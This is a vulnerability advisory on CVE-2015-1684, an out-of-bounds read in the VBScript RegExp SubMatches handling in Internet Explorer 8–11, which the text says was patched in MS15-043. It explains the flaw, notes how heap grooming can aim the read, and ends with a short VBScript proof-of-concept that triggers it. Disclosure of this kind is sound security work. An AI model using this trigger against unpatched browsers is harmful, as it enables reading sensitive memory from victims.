2015-06-11

1502F - MSIE8-11 VBScript CSubMacthes::get_Item out-of-bounds read

TL;DR: Details on CVE-2015-1684: an arbitrary read vulnerability in VBScript regular expressions that affected all version of MSIE, which was fixed by Microsoft in MS15-043 one month ago.

Description

When a VBScript RegExp object is created with an expression that contains a sub match "(...)" inside a look-ahead "(?=...)", and the Execute method is then used to successfully match against a string, the resulting Matches collection will contain Match objects that (under the hood) only store the matched string and do not store the matched look-ahead. However, the SubMatches property can be used to try to read data from within the look-ahead. This results in a controlable out-of-bounds read relative to the addresss of the matched string data. Since the size of the matched string is attacker controlled, as is the time of allocation, heap feng-shui techniques may be used to put it in a useful position relative to memory that contains sensitive information the attacker wants to read. Also, if the matched string is empty a NULL ptr is used as the base, resulting in an absolute read.

Repro

<script language="VBScript">
  Dim oRegExp
  Set oRegExp = New RegExp
  oRegExp.Pattern = "A+(?=0B+([^.]+)*)"
  ' Allocate 0x10 bytes, then read 0x4 bytes at offset 0x12.
  MsgBox(oRegExp.Execute("AAAAA0BBBBBBBBBCC")(0).SubMatches(0))
</script>